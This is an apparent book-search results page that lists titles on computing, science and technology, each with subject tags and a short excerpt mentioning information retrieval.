Ada Lovelace, air freight, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, anti-communist, Apple II, battle of ideas, Berlin Wall, Bill Duvall, Bill Gates: Altair 8800, Byte Shop, Claude Shannon: information theory, computer age, conceptual framework, cuban missile crisis, Donald Davies, double helix, Douglas Engelbart, Douglas Engelbart, Dynabook, experimental subject, fault tolerance, Frederick Winslow Taylor, friendly fire, From Mathematics to the Technologies of Life and Death, Haight Ashbury, Howard Rheingold, information retrieval, invisible hand, Isaac Newton, James Watt: steam engine, Jeff Rulifson, John von Neumann, Leonard Kleinrock, Marc Andreessen, Menlo Park, New Journalism, Norbert Wiener, packet switching, pink-collar, popular electronics, RAND corporation, RFC: Request For Comment, Robert Metcalfe, Silicon Valley, Steve Crocker, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, Ted Nelson, Turing machine, Turing test, Vannevar Bush, Von Neumann architecture, Wiener process, zero-sum game

I first tried to find close relevance within es- tablished disciplines [such as artificial intelligence,] but in each case I found that the people I would talk with would immediately translate my admittedly strange (for the times) statements of purpose and possibility into their own discipline's framework."9 At the 1960 meeting of the American Documentation Institute, a talk he gave was greeted with yawns, and his proposed augmentation environ- ment was dismissed as just another information-retrieval system. No, Engelbart realized, if his augmentation ideas were ever going to fly, he would have to create a new discipline from scratch. And to do that, he would have to give this new discipline a conceptual framework all its own-a manifesto that would layout his thinking in the most compelling way possible. Creating that manifesto took him the better part of two years. "Augmenting the Human Intellect: A Conceptual Framework" wouldn't be completed until October 1962.

No, he didn't-though, as is so often the case with Bob Taylor, the reasons were more complex than they seemed on the surface. To begin with, while he very much liked the idea of having a big influence on PARC's research, he considered Pake's notion of a "graphics research group" a complete nonstarter. Sure, graphics technology was a critical part of this what- ever-it-was he wanted to create. But so were text display, mass-storage technol- ogy, networking technology, information retrieval, and all the rest. Taylor wanted to go after the whole, integrated vision, just as he'd gone after the whole Intergalactic Network. To focus entirely on graphics would be like trying to build the Arpanet by focusing entirely on the technology of telephone lines. And yet Pake did have a point, damn it. At age thirty-eight Taylor had spent his entire adult career funding computer research, but he had never actually done LIVING IN THE FUTURE 345 computer research.


pages: 470 words: 109,589

Apache Solr 3 Enterprise Search Server by Unknown

bioinformatics, continuous integration, database schema, en.wikipedia.org, fault tolerance, Firefox, full text search, information retrieval, natural language processing, performance metric, platform as a service, Ruby on Rails, web application

The major features found in Lucene are: An inverted index for efficient retrieval of documents by indexed terms. The same technology supports numeric data with range queries too. A rich set of chainable text analysis components, such as tokenizers and language-specific stemmers that transform a text string into a series of terms (words). A query syntax with a parser and a variety of query types from a simple term lookup to exotic fuzzy matching. A good scoring algorithm based on sound Information Retrieval (IR) principles to produce the more likely candidates first, with flexible means to affect the scoring. Search enhancing features like:A highlighter feature to show query words found in context. A query spellchecker based on indexed content or a supplied dictionary. A "more like this" feature to list documents that are statistically similar to provided text. To learn more about Lucene, read Lucene In Action, 2nd Edition by Michael McCandless, Erik Hatcher, and Otis Gospodnetić.


pages: 396 words: 117,149

The Master Algorithm: How the Quest for the Ultimate Learning Machine Will Remake Our World by Pedro Domingos

Albert Einstein, Amazon Mechanical Turk, Arthur Eddington, basic income, Bayesian statistics, Benoit Mandelbrot, bioinformatics, Black Swan, Brownian motion, cellular automata, Claude Shannon: information theory, combinatorial explosion, computer vision, constrained optimization, correlation does not imply causation, creative destruction, crowdsourcing, Danny Hillis, data is the new oil, double helix, Douglas Hofstadter, Erik Brynjolfsson, experimental subject, Filter Bubble, future of work, global village, Google Glasses, Gödel, Escher, Bach, information retrieval, job automation, John Markoff, John Snow's cholera map, John von Neumann, Joseph Schumpeter, Kevin Kelly, lone genius, mandelbrot fractal, Mark Zuckerberg, Moneyball by Michael Lewis explains big data, Narrative Science, Nate Silver, natural language processing, Netflix Prize, Network effects, NP-complete, off grid, P = NP, PageRank, pattern recognition, phenotype, planetary scale, pre–internet, random walk, Ray Kurzweil, recommendation engine, Richard Feynman, scientific worldview, Second Machine Age, self-driving car, Silicon Valley, social intelligence, speech recognition, Stanford marshmallow experiment, statistical model, Stephen Hawking, Steven Levy, Steven Pinker, superintelligent machines, the scientific method, The Signal and the Noise by Nate Silver, theory of mind, Thomas Bayes, transaction costs, Turing machine, Turing test, Vernor Vinge, Watson beat the top human players on Jeopardy!, white flight, zero-sum game

Milton Friedman argues for oversimplified theories in “The methodology of positive economics,” which appears in Essays in Positive Economics (University of Chicago Press, 1966). The use of Naïve Bayes in spam filtering is described in “Stopping spam,” by Joshua Goodman, David Heckerman, and Robert Rounthwaite (Scientific American, 2005). “Relevance weighting of search terms,”* by Stephen Robertson and Karen Sparck Jones (Journal of the American Society for Information Science, 1976), explains the use of Naïve Bayes–like methods in information retrieval. “First links in the Markov chain,” by Brian Hayes (American Scientist, 2013), recounts Markov’s invention of the eponymous chains. “Large language models in machine translation,”* by Thorsten Brants et al. (Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning, 2007), explains how Google Translate works.


pages: 365 words: 117,713

The Selfish Gene by Richard Dawkins

double helix, information retrieval, lateral thinking, Necker cube, pattern recognition, phenotype, prisoner's dilemma, zero-sum game

A notable advance was the evolutionary 'invention' of memory. By this device, the timing of muscle contractions could be influenced not only by events in the immediate past, but by events in the distant past as well. The memory, or store, is an essential part of a digital computer too. Computer memories are more reliable than human ones, but they are less capacious, and enormously less sophisticated in their techniques of information-retrieval. One of the most striking properties of survival-machine behaviour is its apparent purposiveness. By this I do not just mean that it seems to be well calculated to help the animal's genes to survive, although of course it is. I am talking about a closer analogy to human purposeful behaviour. When we watch an animal 'searching' for food, or for a mate, or for a lost child, we can hardly help imputing to it some of the subjective feelings we ourselves experience when we search.


pages: 397 words: 110,130

Smarter Than You Think: How Technology Is Changing Our Minds for the Better by Clive Thompson

4chan, A Declaration of the Independence of Cyberspace, augmented reality, barriers to entry, Benjamin Mako Hill, butterfly effect, citizen journalism, Claude Shannon: information theory, conceptual framework, corporate governance, crowdsourcing, Deng Xiaoping, discovery of penicillin, disruptive innovation, Douglas Engelbart, Douglas Engelbart, drone strike, Edward Glaeser, Edward Thorp, en.wikipedia.org, experimental subject, Filter Bubble, Freestyle chess, Galaxy Zoo, Google Earth, Google Glasses, Gunnar Myrdal, Henri Poincaré, hindsight bias, hive mind, Howard Rheingold, information retrieval, iterative process, jimmy wales, Kevin Kelly, Khan Academy, knowledge worker, lifelogging, Mark Zuckerberg, Marshall McLuhan, Menlo Park, Netflix Prize, Nicholas Carr, Panopticon Jeremy Bentham, patent troll, pattern recognition, pre–internet, Richard Feynman, Ronald Coase, Ronald Reagan, Rubik’s Cube, sentiment analysis, Silicon Valley, Skype, Snapchat, Socratic dialogue, spaced repetition, superconnector, telepresence, telepresence robot, The Nature of the Firm, the scientific method, The Wisdom of Crowds, theory of mind, transaction costs, Vannevar Bush, Watson beat the top human players on Jeopardy!, WikiLeaks, X Prize, éminence grise

the Wikipedia page on “Drone attacks in Pakistan”: “Drone attacks in Pakistan,” Wikipedia, accessed March 24, 2013, en.wikipedia.org/wiki/Drone_attacks_in_Pakistan. 40 percent of all queries are acts of remembering: Jaime Teevan, Eytan Adar, Rosie Jones, and Michael A. S. Potts, “Information Re-Retrieval: Repeat Queries in Yahoo’s Logs,” in SIGIR ’07: Proceedings of the 30th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval (2007), 151–58. collaborative inhibition: Celia B. Harris, Paul G. Keil, John Sutton, and Amanda J. Barnier, “We Remember, We Forget: Collaborative Remembering in Older Couples,” Discourse Processes 48, no. 4 (2011), 267–303. In his essay “Mathematical Creation”: Henri Poincaré, “Mathematical Creation,” in The Anatomy of Memory: An Anthology (New York: Oxford University Press, 1996), 126–35.


pages: 437 words: 113,173

Age of Discovery: Navigating the Risks and Rewards of Our New Renaissance by Ian Goldin, Chris Kutarna

2013 Report for America's Infrastructure - American Society of Civil Engineers - 19 March 2013, 3D printing, Airbnb, Albert Einstein, AltaVista, Asian financial crisis, asset-backed security, autonomous vehicles, banking crisis, barriers to entry, battle of ideas, Berlin Wall, bioinformatics, bitcoin, Bonfire of the Vanities, clean water, collective bargaining, Colonization of Mars, Credit Default Swap, crowdsourcing, cryptocurrency, Dava Sobel, demographic dividend, Deng Xiaoping, Doha Development Round, double helix, Edward Snowden, Elon Musk, en.wikipedia.org, epigenetics, experimental economics, failed state, Fall of the Berlin Wall, financial innovation, full employment, Galaxy Zoo, global pandemic, global supply chain, Hyperloop, immigration reform, income inequality, indoor plumbing, industrial cluster, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invention of the printing press, Isaac Newton, Islamic Golden Age, Johannes Kepler, Khan Academy, Kickstarter, low cost airline, low cost carrier, low skilled workers, Lyft, Malacca Straits, mass immigration, megacity, Mikhail Gorbachev, moral hazard, Nelson Mandela, Network effects, New Urbanism, non-tariff barriers, Occupy movement, On the Revolutions of the Heavenly Spheres, open economy, Panamax, Pearl River Delta, personalized medicine, Peter Thiel, post-Panamax, profit motive, rent-seeking, reshoring, Robert Gordon, Robert Metcalfe, Search for Extraterrestrial Intelligence, Second Machine Age, self-driving car, Shenzhen was a fishing village, Silicon Valley, Silicon Valley startup, Skype, smart grid, Snapchat, special economic zone, spice trade, statistical model, Stephen Hawking, Steve Jobs, Stuxnet, The Future of Employment, too big to fail, trade liberalization, trade route, transaction costs, transatlantic slave trade, uber lyft, undersea cable, uranium enrichment, We are the 99%, We wanted flying cars, instead we got 140 characters, working poor, working-age population, zero day

Goldin, Ian, ed. (2014). Is the Planet Full? Oxford: Oxford University Press. 48. Goldin, Ian and Kenneth Reinert (2012). Globalization for Development. Oxford: Oxford University Press. 49. Vietnam Food Association (2014). “Yearly Export Statistics.” Retrieved from vietfood.org.vn/en/default.aspx?c=108. 50. Bangladesh Garment Manufacturers and Exporters Association (2015). “Trade Information.” Retrieved from bgmea.com.bd/home/pages/TradeInformation#.U57MMhZLGYU. 51. Burke, Jason (2013, November 14). “Bangladesh Garment Workers Set for 77% Pay Rise.” The Guardian. Retrieved from www.theguardian.com. 52. Goldin, Ian and Kenneth Reinert (2012). Globalization for Development. Oxford: Oxford University Press. 53. Industrial Development Bureau (2015). “Industry Introduction—History of Industrial Development.”


pages: 523 words: 112,185

Doing Data Science: Straight Talk From the Frontline by Cathy O'Neil, Rachel Schutt

Amazon Mechanical Turk, augmented reality, Augustin-Louis Cauchy, barriers to entry, Bayesian statistics, bioinformatics, computer vision, correlation does not imply causation, crowdsourcing, distributed generation, Edward Snowden, Emanuel Derman, fault tolerance, Filter Bubble, finite state, Firefox, game design, Google Glasses, index card, information retrieval, iterative process, John Harrison: Longitude, Khan Academy, Kickstarter, Mars Rover, Nate Silver, natural language processing, Netflix Prize, p-value, pattern recognition, performance metric, personalized medicine, pull request, recommendation engine, rent-seeking, selection bias, Silicon Valley, speech recognition, statistical model, stochastic process, text mining, the scientific method, The Wisdom of Crowds, Watson beat the top human players on Jeopardy!, X Prize

There is also the false positive rate and the false negative rate, and these don’t get other special names. Another evaluation metric you could use is precision, defined in Chapter 5. The fact that some of the same formulas have different names is due to the fact that different academic disciplines have developed these ideas separately. So precision and recall are the quantities used in the field of information retrieval. Note that precision is not the same thing as specificity. Finally, we have accuracy, which is the ratio of the number of correct labels to the total number of labels, and the misclassification rate, which is just 1–accuracy. Minimizing the misclassification rate then just amounts to maximizing accuracy. Putting it all together Now that you have a distance measure and an evaluation metric, you’re ready to roll.


pages: 436 words: 124,373

Galactic North by Alastair Reynolds

back-to-the-land, Buckminster Fuller, hive mind, information retrieval, Kickstarter, risk/return, stem cell, trade route

"Disclose all our confidential practices while you're at it, Mirsky," Seven said. She glared at him through her visor. "Veda would have figured it out." "We'll never know now, will we?" "What does it matter?" she said. "Gonna kill them anyway, aren't you?" Seven flashed an arc of teeth filed to points and waved a hand towards the female pirate. "Allow me to introduce Mirsky, our loose-tongued but efficient information retrieval specialist. She's going to take you on a little trip down memory lane; see if we can't remember those access codes." "What codes?" "It'll come back to you," Seven said. They were taken through the tunnels, past half-assembled mining machines, onto the surface and then into the pirate ship. The ship was huge: most of it living space. Cramped corridors snaked through hydroponics galleries of spring wheat and dwarf papaya, strung with xenon lights.


pages: 597 words: 119,204

Website Optimization by Andrew B. King

AltaVista, bounce rate, don't be evil, en.wikipedia.org, Firefox, In Cold Blood by Truman Capote, information retrieval, iterative process, Kickstarter, medical malpractice, Network effects, performance metric, search engine result page, second-price auction, second-price sealed-bid, semantic web, Silicon Valley, slashdot, social graph, Steve Jobs, web application

If all you have is the total page download time, or even large "buckets" of time (like content download versus network), you won't be able to improve performance. This is especially true in the more complex world of the Web where application calls are hidden within the content portion of the page and third parties are critical to the overall download time. You need to have a view into every piece of the page load in order to manage and improve it. * * * [167] Roast, C. 1998. "Designing for Delay in Interactive Information Retrieval." Interacting with Computers 10 (1): 87–104. [168] Balashov, K., and A. King. 2003. "Compressing the Web." In Speed Up Your Site: Web Site Optimization. Indianapolis: New Riders, 412. A test of 25 popular sites found that HTTP gzip compression saved 75% on average off text file sizes and 37% overall. [169] Bent, L. et al. 2004. "Characterization of a large web site population with implications for content delivery."


pages: 570 words: 115,722

The Tangled Web: A Guide to Securing Modern Web Applications by Michal Zalewski

barriers to entry, business process, defense in depth, easy for humans, difficult for computers, fault tolerance, finite state, Firefox, Google Chrome, information retrieval, RFC: Request For Comment, semantic web, Steve Jobs, telemarketer, Turing test, Vannevar Bush, web application, WebRTC, WebSocket

The subsequent proposals experimented with an increasingly bizarre set of methods to permit interactions other than retrieving a document or running a script, including such curiosities as SHOWMETHOD, CHECKOUT, or—why not—SPACEJUMP.[122] Most of these thought experiments have been abandoned in HTTP/1.1, which settles on a more manageable set of eight methods. Only the first two request types—GET and POST—are of any significance to most of the modern Web. GET The GET method is meant to signify information retrieval. In practice, it is used for almost all client-server interactions in the course of a normal browsing session. Regular GET requests carry no browser-supplied payloads, although they are not strictly prohibited from doing so. The expectation is that GET requests should not have, to quote the RFC, “significance of taking an action other than retrieval” (that is, they should make no persistent changes to the state of the application).


pages: 320 words: 87,853

The Black Box Society: The Secret Algorithms That Control Money and Information by Frank Pasquale

Affordable Care Act / Obamacare, algorithmic trading, Amazon Mechanical Turk, American Legislative Exchange Council, asset-backed security, Atul Gawande, bank run, barriers to entry, basic income, Berlin Wall, Bernie Madoff, Black Swan, bonus culture, Brian Krebs, business cycle, call centre, Capital in the Twenty-First Century by Thomas Piketty, Chelsea Manning, Chuck Templeton: OpenTable:, cloud computing, collateralized debt obligation, computerized markets, corporate governance, Credit Default Swap, credit default swaps / collateralized debt obligations, crowdsourcing, cryptocurrency, Debian, don't be evil, drone strike, Edward Snowden, en.wikipedia.org, Fall of the Berlin Wall, Filter Bubble, financial innovation, financial thriller, fixed income, Flash crash, full employment, Goldman Sachs: Vampire Squid, Google Earth, Hernando de Soto, High speed trading, hiring and firing, housing crisis, informal economy, information asymmetry, information retrieval, interest rate swap, Internet of things, invisible hand, Jaron Lanier, Jeff Bezos, job automation, Julian Assange, Kevin Kelly, knowledge worker, Kodak vs Instagram, kremlinology, late fees, London Interbank Offered Rate, London Whale, Marc Andreessen, Mark Zuckerberg, mobile money, moral hazard, new economy, Nicholas Carr, offshore financial centre, PageRank, pattern recognition, Philip Mirowski, precariat, profit maximization, profit motive, quantitative easing, race to the bottom, recommendation engine, regulatory arbitrage, risk-adjusted returns, Satyajit Das, search engine result page, shareholder value, Silicon Valley, Snapchat, social intelligence, Spread Networks laid a new fibre optics cable between New York and Chicago, statistical arbitrage, statistical model, Steven Levy, the scientific method, too big to fail, transaction costs, two-sided market, universal basic income, Upton Sinclair, value at risk, WikiLeaks, zero-sum game

But here, again, competition may be illusory: it’s hard to see the rationale (or investor or public enthusiasm) for subjecting millions of volumes (many of them delicate) to another round of scanning. Once again, Google reigns by default. The question now is whether its dictatorship will be benign. Does Google intend Book Search to promote widespread public access, or is it envisioning finely tiered access to content, granted (and withheld) in opaque ways?168 Will Google grant open access to search results on its platform, so experts in library science and information retrieval can understand (and critique) its orderings of results?169 Finally, where will the profits go from this immense cooperative project? Will they be distributed fairly among contributors, or will this be another instance in which the aggregator of content captures an unfair share of revenues from well-established dynamics of content digitization? If the Internet is to prosper, all who provide content—its critical source of value—must share in the riches now enjoyed mainly by the megafirms that organize it.170 And to the extent that Google, Amazon, or any other major search engine limits access to an index of books, its archiving projects are suspect, whatever public-spirited slogans it may adduce in defense of them.171 Philosopher Iris Murdoch once said, “Man is a creature who makes pictures of himself and then comes to resemble the picture.


pages: 410 words: 119,823

Radical Technologies: The Design of Everyday Life by Adam Greenfield

3D printing, Airbnb, augmented reality, autonomous vehicles, bank run, barriers to entry, basic income, bitcoin, blockchain, business intelligence, business process, call centre, cellular automata, centralized clearinghouse, centre right, Chuck Templeton: OpenTable:, cloud computing, collective bargaining, combinatorial explosion, Computer Numeric Control, computer vision, Conway's Game of Life, cryptocurrency, David Graeber, dematerialisation, digital map, disruptive innovation, distributed ledger, drone strike, Elon Musk, Ethereum, ethereum blockchain, facts on the ground, fiat currency, global supply chain, global village, Google Glasses, IBM and the Holocaust, industrial robot, informal economy, information retrieval, Internet of things, James Watt: steam engine, Jane Jacobs, Jeff Bezos, job automation, John Conway, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, joint-stock company, Kevin Kelly, Kickstarter, late capitalism, license plate recognition, lifelogging, M-Pesa, Mark Zuckerberg, means of production, megacity, megastructure, minimum viable product, money: store of value / unit of account / medium of exchange, natural language processing, Network effects, New Urbanism, Occupy movement, Oculus Rift, Pareto efficiency, pattern recognition, Pearl River Delta, performance metric, Peter Eisenman, Peter Thiel, planetary scale, Ponzi scheme, post scarcity, post-work, RAND corporation, recommendation engine, RFID, rolodex, Satoshi Nakamoto, self-driving car, sentiment analysis, shareholder value, sharing economy, Silicon Valley, smart cities, smart contracts, social intelligence, sorting algorithm, special economic zone, speech recognition, stakhanovite, statistical model, stem cell, technoutopianism, Tesla Model S, the built environment, The Death and Life of Great American Cities, The Future of Employment, transaction costs, Uber for X, undersea cable, universal basic income, urban planning, urban sprawl, Whole Earth Review, WikiLeaks, women in the workforce

One scenario along these lines is that proposed by Simon Taylor, VP for Blockchain R&D at Barclays Bank, in a white paper on distributed-ledger applications prepared for the British government.19 Taylor imagines all of our personal information stored on a common blockchain, duly encrypted. Any legitimate actor, public or private—the HR department, the post office, your bank, the police—could query the same unimpeachable source of information, retrieve from it only what they were permitted to, and leave behind a trace of their access. Each of us would have read/write access to our own record; should we find erroneous information, we would have to make but one correction, and it would then propagate across the files of every institution with access to the ledger. Where the data undergirding our lives is now maintained on a thousand separate systems, and vital knowledge so often falls into the cracks between them, Taylor sees a single common and shared truth, referred to equally and with equal transparency by all parties.


pages: 303 words: 67,891

Advances in Artificial General Intelligence: Concepts, Architectures and Algorithms: Proceedings of the Agi Workshop 2006 by Ben Goertzel, Pei Wang

AI winter, artificial general intelligence, bioinformatics, brain emulation, combinatorial explosion, complexity theory, computer vision, conceptual framework, correlation coefficient, epigenetics, friendly AI, G4S, information retrieval, Isaac Newton, John Conway, Loebner Prize, Menlo Park, natural language processing, Occam's razor, p-value, pattern recognition, performance metric, Ray Kurzweil, Rodney Brooks, semantic web, statistical model, strong AI, theory of mind, traveling salesman, Turing machine, Turing test, Von Neumann architecture, Y2K

NARS can be connected to existing knowledge bases, such as Cyc (for commonsense knowledge), WordNet (for linguistic knowledge), Mizar (for mathematical knowledge), and so on. For each of them, a special interface module should be able to approximately translate knowledge from its original format into Narsese. x The Internet. It is possible for NARS to be equipped with additional modules, which use techniques like semantic web, information retrieval, and data mining, to directly acquire certain knowledge from the Internet, and put them into Narsese. x Natural language interface. After NARS has learned a natural language (as discussed previously), it should be able to accept knowledge from various sources in that language. Additionally, interactive tutoring will be necessary, which allows a human trainer to monitor the establishing of the knowledge base, to answer questions, to guide the system to form a proper goal structure and priority distributions among its concepts, tasks, and beliefs.


pages: 455 words: 138,716

The Divide: American Injustice in the Age of the Wealth Gap by Matt Taibbi

banking crisis, Bernie Madoff, butterfly effect, buy and hold, collapse of Lehman Brothers, collateralized debt obligation, Corrections Corporation of America, Credit Default Swap, credit default swaps / collateralized debt obligations, Edward Snowden, ending welfare as we know it, fixed income, forensic accounting, Gordon Gekko, greed is good, illegal immigration, information retrieval, London Interbank Offered Rate, London Whale, naked short selling, offshore financial centre, Ponzi scheme, profit motive, regulatory arbitrage, short selling, telemarketer, too big to fail, War on Poverty

“Just think what I could do with your emails,” he hissed, adding that he, Spyro, was going to “consider all my options as maintaining our confidentiality,” and that if the executive didn’t cooperate, he could “no longer rely on my discretion.” Contogouris seemed to be playing a triple game. First, he was genuinely trying to deliver an informant to the FBI and set himself up as an FBI informant. Second, he was trying to deliver confidential information to the hedge funds, to whom he had set himself up as an expert at information retrieval. And third, he was playing secret source to “reputable” journalists, to whom he had promised to deliver stunning exposés. Contogouris even referenced one of those contacts in his adolescent coded emails to Sender sent from London that day: CONTOGOURIS: We have been rapping here about the postman. He’s going to deliver mail. The senders want a message delivered*11 “The postman” here was Boyd of the New York Post, with whom Contogouris had been working to prepare a major “exposé” on Fairfax.


pages: 696 words: 143,736

The Age of Spiritual Machines: When Computers Exceed Human Intelligence by Ray Kurzweil

Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, Any sufficiently advanced technology is indistinguishable from magic, Buckminster Fuller, call centre, cellular automata, combinatorial explosion, complexity theory, computer age, computer vision, cosmological constant, cosmological principle, Danny Hillis, double helix, Douglas Hofstadter, Everything should be made as simple as possible, first square of the chessboard / second half of the chessboard, fudge factor, George Gilder, Gödel, Escher, Bach, I think there is a world market for maybe five computers, information retrieval, invention of movable type, Isaac Newton, iterative process, Jacquard loom, John Markoff, John von Neumann, Lao Tzu, Law of Accelerating Returns, mandelbrot fractal, Marshall McLuhan, Menlo Park, natural language processing, Norbert Wiener, optical character recognition, ought to be enough for anybody, pattern recognition, phenotype, Ralph Waldo Emerson, Ray Kurzweil, Richard Feynman, Robert Metcalfe, Schrödinger's Cat, Search for Extraterrestrial Intelligence, self-driving car, Silicon Valley, social intelligence, speech recognition, Steven Pinker, Stewart Brand, stochastic process, technological singularity, Ted Kaczynski, telepresence, the medium is the message, There's no reason for any individual to have a computer in his home - Ken Olsen, traveling salesman, Turing machine, Turing test, Whole Earth Review, Y2K

Cybernetic poet A computer program that is able to create original poetry. Cybernetics A term coined by Norbert Wiener to describe the “science of control and communication in animals and machines.” Cybernetics is based on the theory that intelligent living beings adapt to their environments and accomplish objectives primarily by reacting to feedback from their surroundings. Database The structured collection of data that is designed in connection with an information retrieval system. A database management system (DBMS) allows monitoring, updating, and interacting with the database. Debugging The process of discovering and correcting errors in computer hardware and software. The issue of bugs or errors in a program will become increasingly important as computers are integrated into the human brain and physiology throughout the twenty-first century. The first “bug” was an actual moth, discovered by Grace Murray Hopper, the first programmer of the Mark I computer.


pages: 550 words: 154,725

The Idea Factory: Bell Labs and the Great Age of American Innovation by Jon Gertner

Albert Einstein, back-to-the-land, Black Swan, business climate, Claude Shannon: information theory, Clayton Christensen, complexity theory, corporate governance, cuban missile crisis, Edward Thorp, horn antenna, Hush-A-Phone, information retrieval, invention of the telephone, James Watt: steam engine, Karl Jansky, knowledge economy, Leonard Kleinrock, Metcalfe’s law, Nicholas Carr, Norbert Wiener, Picturephone, Richard Feynman, Robert Metcalfe, Sand Hill Road, Silicon Valley, Skype, Steve Jobs, Telecommunications Act of 1996, traveling salesman, undersea cable, uranium enrichment, William Shockley: the traitorous eight

A visitor could also try something called a portable “pager,” a big, blocky device that could alert doctors and other busy professionals when they received urgent calls.2 New York’s fair would dwarf Seattle’s. The crowds were expected to be immense—probably somewhere around 50 or 60 million people in total. Pierce and David’s 1961 memo recommended a number of exhibits: “personal hand-carried telephones,” “business letters in machine-readable form, transmitted by wire,” “information retrieval from a distant computer-automated library,” and “satellite and space communications.” By the time the fair opened in April 1964, though, the Bell System exhibits, housed in a huge white cantilevered building nicknamed the “floating wing,” described a more conservative future than the one Pierce and David had envisioned. The exhibit was primarily explanatory. Visitors could get a sense of how quality control worked at Western Electric factories, or how researchers at Bell Labs grew pure crystals necessary for transistors.


pages: 492 words: 153,565

Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon by Kim Zetter

Ayatollah Khomeini, Brian Krebs, crowdsourcing, data acquisition, Doomsday Clock, drone strike, Edward Snowden, facts on the ground, Firefox, friendly fire, Google Earth, information retrieval, John Markoff, Julian Assange, Kickstarter, Loma Prieta earthquake, Maui Hawaii, MITM: man-in-the-middle, pre–internet, RAND corporation, Silicon Valley, skunkworks, smart grid, smart meter, South China Sea, Stuxnet, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, Y2K, zero day

See “Software Problem Led to System Failure at Dhahran, Saudi Arabia,” US Government Accountability Office, February 4, 1992, available at gao.gov/products/IMTEC-92-26. 22 Bryan, “Lessons from Our Cyber Past.” 23 “The Information Operations Roadmap,” dated October 30, 2003, is a seventy-four-page report that was declassified in 2006, though the pages dealing with computer network attacks are heavily redacted. The document is available at http://information-retrieval.info/docs/DoD-IO.html. 24 Arquilla Frontline “CyberWar!” interview. A Washington Post story indicates that attacks on computers controlling air-defense systems in Kosovo were launched from electronic-jamming aircraft rather than over computer networks from ground-based keyboards. Bradley Graham, “Military Grappling with Rules for Cyber,” Washington Post, November 8, 1999. 25 James Risen, “Crisis in the Balkans: Subversion; Covert Plan Said to Take Aim at Milosevic’s Hold on Power,” New York Times, June 18, 1999.


pages: 527 words: 147,690

Terms of Service: Social Media and the Price of Constant Connection by Jacob Silverman

23andMe, 4chan, A Declaration of the Independence of Cyberspace, Airbnb, airport security, Amazon Mechanical Turk, augmented reality, basic income, Brian Krebs, California gold rush, call centre, cloud computing, cognitive dissonance, commoditize, correlation does not imply causation, Credit Default Swap, crowdsourcing, don't be evil, drone strike, Edward Snowden, feminist movement, Filter Bubble, Firefox, Flash crash, game design, global village, Google Chrome, Google Glasses, hive mind, income inequality, informal economy, information retrieval, Internet of things, Jaron Lanier, jimmy wales, Kevin Kelly, Kickstarter, knowledge economy, knowledge worker, late capitalism, license plate recognition, life extension, lifelogging, Lyft, Mark Zuckerberg, Mars Rover, Marshall McLuhan, mass incarceration, meta analysis, meta-analysis, Minecraft, move fast and break things, move fast and break things, national security letter, Network effects, new economy, Nicholas Carr, Occupy movement, optical character recognition, payday loans, Peter Thiel, postindustrial economy, prediction markets, pre–internet, price discrimination, price stability, profit motive, quantitative hedge fund, race to the bottom, Ray Kurzweil, recommendation engine, rent control, RFID, ride hailing / ride sharing, self-driving car, sentiment analysis, shareholder value, sharing economy, Silicon Valley, Silicon Valley ideology, Snapchat, social graph, social intelligence, social web, sorting algorithm, Steve Ballmer, Steve Jobs, Steven Levy, TaskRabbit, technoutopianism, telemarketer, transportation-network company, Travis Kalanick, Turing test, Uber and Lyft, Uber for X, uber lyft, universal basic income, unpaid internship, women in the workforce, Y Combinator, Zipcar

Already the NSA is able to record and sort all phone calls in several countries in real time. As storage costs decrease and analytical powers grow, it’s not unreasonable to think that this capability will be extended to other targets, including, should the political environment allow it, the United States. Some of the NSA’s surveillance capacity derives from deals made with Internet firms—procedures for automating court-authorized information retrieval, direct access to central servers, and even (as in the case of Verizon) fiber optic cables piped from military bases into major Internet hubs. In the United States, the NSA uses the FBI to conduct surveillance authorized under the Patriot Act and to issue National Security Letters (NSLs)—subpoenas requiring recipients to turn over any information deemed relevant to an ongoing investigation.


pages: 467 words: 149,632

If Then: How Simulmatics Corporation Invented the Future by Jill Lepore

A Declaration of the Independence of Cyberspace, anti-communist, Buckminster Fuller, computer age, coronavirus, cuban missile crisis, desegregation, don't be evil, Donald Trump, Elon Musk, game design, George Gilder, Grace Hopper, Hacker Ethic, Howard Zinn, index card, information retrieval, Jaron Lanier, Jeff Bezos, Jeffrey Epstein, job automation, land reform, linear programming, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, mass incarceration, Maui Hawaii, Menlo Park, New Journalism, New Urbanism, Norbert Wiener, Norman Mailer, packet switching, Peter Thiel, profit motive, RAND corporation, Robert Bork, Ronald Reagan, Rosa Parks, self-driving car, Silicon Valley, smart cities, South China Sea, Stewart Brand, technoutopianism, Telecommunications Act of 1996, urban renewal, War on Poverty, white flight, Whole Earth Catalog

To help his reader picture what he pictured, he conjured a scene set in 2000 in which a person sits at a computer console and attempts to get to the bottom of a research question merely by undertaking a series of searches. Nearly all of what Licklider described in Libraries of the Future later came to pass: the digitization of printed material, the networking of library catalogs and their contents, the development of sophisticated, natural language–based information-retrieval and search mechanisms.23 Licklider described, with a contagious amazement, what would become, in the twenty-first century, the Internet at its very best. In 1962, Licklider left Bolt Beranek and Newman for ARPA, where his many duties included funding behavioral science projects, including Pool’s Project ComCom. At ARPA, Licklider also funded research that produced the building blocks of his imagined intergalactic computer network, which came to be called ARPANET.


pages: 542 words: 161,731

Alone Together by Sherry Turkle

Albert Einstein, Columbine, global village, Hacker Ethic, helicopter parent, Howard Rheingold, industrial robot, information retrieval, Jacques de Vaucanson, Jaron Lanier, Joan Didion, John Markoff, Kevin Kelly, lifelogging, Loebner Prize, Marshall McLuhan, meta analysis, meta-analysis, Nicholas Carr, Norbert Wiener, Panopticon Jeremy Bentham, Ralph Waldo Emerson, Rodney Brooks, Skype, social intelligence, stem cell, technoutopianism, The Great Good Place, the medium is the message, theory of mind, Turing test, Vannevar Bush, Wall-E, women in the workforce, Year of Magical Thinking

